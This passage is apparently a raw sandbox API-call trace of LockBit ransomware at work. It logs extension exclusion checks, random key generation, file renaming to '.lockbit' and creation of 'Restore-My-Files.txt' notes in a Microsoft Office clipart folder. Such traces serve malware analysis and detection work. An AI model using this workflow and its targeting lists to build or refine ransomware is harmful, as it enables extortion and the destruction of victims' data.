lpString2="WB01241_.GIF") returned -1 [0179.850] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01241_.GIF") returned -1 [0179.851] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01241_.GIF") returned -1 [0179.851] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.851] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01241_.GIF") returned=".GIF" [0179.851] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.851] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.851] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.851] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.851] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.851] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.851] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.851] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.852] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.852] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.852] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.852] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.852] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.852] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.852] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.852] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.852] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01241_.GIF.lockbit") returned 72 [0179.852] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01241_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01241_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.853] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.853] malloc (_Size=0x40068) returned 0x3df0008 [0179.853] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=386) returned 1 [0179.853] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.854] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.855] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.859] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01241_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01241_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.859] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.859] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0179.859] free (_Block=0x1fa2ed8) [0179.859] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01241_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.860] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.860] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.860] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e14c700, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7e14c700, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01242_.GIF", cAlternateFileName="")) returned 1 [0179.860] lstrcmpiW (lpString1=".", lpString2="WB01242_.GIF") returned -1 [0179.860] lstrcmpiW (lpString1="..", lpString2="WB01242_.GIF") returned -1 [0179.860] PathFindExtensionW (pszPath="WB01242_.GIF") returned=".GIF" [0179.860] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.860] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.860] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.860] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.860] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.860] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.860] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.860] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.860] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.860] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.860] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.860] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.860] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.860] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.860] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.860] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.861] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.861] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.861] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.861] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.861] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.861] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.861] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.862] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.862] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.862] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.862] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.862] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.862] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01242_.GIF") returned -1 [0179.862] lstrcmpiW (lpString1="ntldr", lpString2="WB01242_.GIF") returned -1 [0179.862] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01242_.GIF") returned -1 [0179.862] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01242_.GIF") returned -1 [0179.862] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01242_.GIF") returned -1 [0179.862] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01242_.GIF") returned -1 [0179.862] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01242_.GIF") returned -1 [0179.862] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.862] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01242_.GIF") returned=".GIF" [0179.862] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.862] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.862] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.862] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.863] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.863] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.863] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.863] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.863] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.863] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01242_.GIF.lockbit") returned 72 [0179.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01242_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01242_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.865] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.865] malloc (_Size=0x40068) returned 0x3df0008 [0179.865] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=344) returned 1 [0179.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.866] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01242_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01242_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.871] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.871] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0179.871] free (_Block=0x1fa2ed8) [0179.871] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01242_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.871] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.871] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.871] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b01f700, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b01f700, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x1af, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01243_.GIF", cAlternateFileName="")) returned 1 [0179.871] lstrcmpiW (lpString1=".", lpString2="WB01243_.GIF") returned -1 [0179.871] lstrcmpiW (lpString1="..", lpString2="WB01243_.GIF") returned -1 [0179.871] PathFindExtensionW (pszPath="WB01243_.GIF") returned=".GIF" [0179.871] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.871] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.871] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.872] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.872] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.873] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.873] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01243_.GIF") returned -1 [0179.873] lstrcmpiW (lpString1="ntldr", lpString2="WB01243_.GIF") returned -1 [0179.873] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01243_.GIF") returned -1 [0179.873] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01243_.GIF") returned -1 [0179.873] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01243_.GIF") returned -1 [0179.873] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01243_.GIF") returned -1 [0179.873] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01243_.GIF") returned -1 [0179.873] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.873] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01243_.GIF") returned=".GIF" [0179.874] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.874] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.874] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.875] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.875] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.875] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01243_.GIF.lockbit") returned 72 [0179.875] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01243_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01243_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.877] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.877] malloc (_Size=0x40068) returned 0x3df0008 [0179.877] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=431) returned 1 [0179.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.878] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01243_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01243_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.880] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.880] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.881] free (_Block=0x1fa2ed8) [0179.881] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01243_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.881] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.881] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b82ae00, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b82ae00, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01244_.GIF", cAlternateFileName="")) returned 1 [0179.882] lstrcmpiW 